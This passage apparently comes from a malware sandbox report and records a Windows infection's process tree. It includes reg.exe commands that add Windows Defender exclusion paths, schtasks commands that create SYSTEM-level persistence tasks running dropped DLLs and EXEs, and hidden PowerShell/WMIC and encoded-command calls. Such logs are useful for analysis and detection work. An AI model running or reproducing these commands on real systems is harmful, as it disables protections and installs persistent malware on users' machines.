                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2920
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2688
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1968
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1476
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2640
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:3016
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1460
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2164
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1684
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:3012
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2128
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2708
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1588
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1752
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2816
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1108
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:1308
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:272
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:3032
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:2020
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:2596
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:908
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:2064
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:2468
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:1524
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:1392
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                                PID:1636
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                  PID:2228
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:2272
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:1388
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                      4⤵
                                                                                        PID:276
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                        4⤵
                                                                                          PID:2240
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:32
                                                                                          4⤵
                                                                                            PID:2460
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:64
                                                                                            4⤵
                                                                                              PID:2368
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                                PID:2052
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                  PID:1436
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 07:32:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\wyOxbcC.exe\" XT /YSsite_idNUT 385118 /S" /V1 /F
                                                                                                3⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Creates scheduled task(s)
                                                                                                PID:1596
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
                                                                                                3⤵
                                                                                                  PID:1600
                                                                                              • C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\wyOxbcC.exe
                                                                                                C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\wyOxbcC.exe XT /YSsite_idNUT 385118 /S
                                                                                                2⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Drops Chrome extension
                                                                                                • Drops file in System32 directory
                                                                                                • Drops file in Program Files directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies system certificate store
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:1124
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
                                                                                                  3⤵
                                                                                                    PID:2836
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                    3⤵
                                                                                                      PID:2396
                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                        4⤵
                                                                                                          PID:568
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                            5⤵
                                                                                                              PID:1704
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                6⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:2904
                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                  7⤵
                                                                                                                    PID:1740
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                              4⤵
                                                                                                                PID:2040
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                  5⤵
                                                                                                                    PID:1600
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                      6⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:2876
                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                        7⤵
                                                                                                                          PID:1500
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\jDkXDR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
                                                                                                                  3⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:540
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\ybLjHUl.xml" /RU "SYSTEM"
                                                                                                                  3⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:1788
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /END /TN "qbSDwEgyNYPZlGA"
                                                                                                                  3⤵
                                                                                                                    PID:1700
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
                                                                                                                    3⤵
                                                                                                                      PID:1272
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\HKKskKx.xml" /RU "SYSTEM"
                                                                                                                      3⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:2368
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\DwRdMKH.xml" /RU "SYSTEM"
                                                                                                                      3⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:1396
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\tgGClxl.xml" /RU "SYSTEM"
                                                                                                                      3⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:2424
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\UimoPzC.xml" /RU "SYSTEM"
                                                                                                                      3⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:2460
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 21:24:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\LPKpLWEu\xePkSvs.dll\",#1 /zJsite_idGoz 385118" /V1 /F
                                                                                                                      3⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:1140
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /run /I /tn "QhciBzJOokLnyYZub"
                                                                                                                      3⤵
                                                                                                                        PID:1732
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
                                                                                                                        3⤵
                                                                                                                          PID:2564
                                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\LPKpLWEu\xePkSvs.dll",#1 /zJsite_idGoz 385118
                                                                                                                        2⤵
                                                                                                                          PID:2592
                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\LPKpLWEu\xePkSvs.dll",#1 /zJsite_idGoz 385118
                                                                                                                            3⤵
                                                                                                                            • Blocklisted process makes network request
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Enumerates system info in registry
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:1404
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
                                                                                                                              4⤵
                                                                                                                                PID:1896
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\sCLSBctEBYVgufH\LaaVLNZ.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\sCLSBctEBYVgufH\LaaVLNZ.exe XT /SIsite_idTIg 385118 /S
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops Chrome extension
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:2000
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
                                                                                                                              3⤵
                                                                                                                                PID:1164
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                3⤵
                                                                                                                                  PID:2044
                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                    4⤵
                                                                                                                                      PID:2928
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                        5⤵
                                                                                                                                          PID:1068
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                            6⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            PID:1904
                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                              7⤵
                                                                                                                                                PID:1500
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                          4⤵
                                                                                                                                            PID:1056
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                              5⤵
                                                                                                                                                PID:1336
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                  6⤵
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  PID:2436
                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                    7⤵
                                                                                                                                                      PID:2844
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\TUtaqa.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
                                                                                                                                              3⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:1944
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\onKRUPF.xml" /RU "SYSTEM"
                                                                                                                                              3⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:2576
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /END /TN "qbSDwEgyNYPZlGA"
                                                                                                                                              3⤵
                                                                                                                                                PID:2304
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
                                                                                                                                                3⤵
                                                                                                                                                  PID:1652
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\dBBpCNE.xml" /RU "SYSTEM"
                                                                                                                                                  3⤵
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:1828
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\KVywPIe.xml" /RU "SYSTEM"
                                                                                                                                                  3⤵
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:1752
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\xbIykrP.xml" /RU "SYSTEM"
                                                                                                                                                  3⤵
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:2644
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\FMFiqIA.xml" /RU "SYSTEM"
                                                                                                                                                  3⤵
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:1932
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1020
                                                                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                                                                taskeng.exe {3B0BE6A7-60C0-4381-92CF-037DE49A43C9} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
                                                                                                                                                1⤵
                                                                                                                                                  PID:624
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    PID:960
                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2944
                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-1972932870-1941491942-1133985732-1087295418-1272828536-4895298974991583-1935063470"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2800
                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-93615735795422323513718662521567398421512075985-148220418-1124605315-845929105"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1436
                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "213979558614783256393608861721657642784-37008122233143556120224377701222621298"
                                                                                                                                                        1⤵
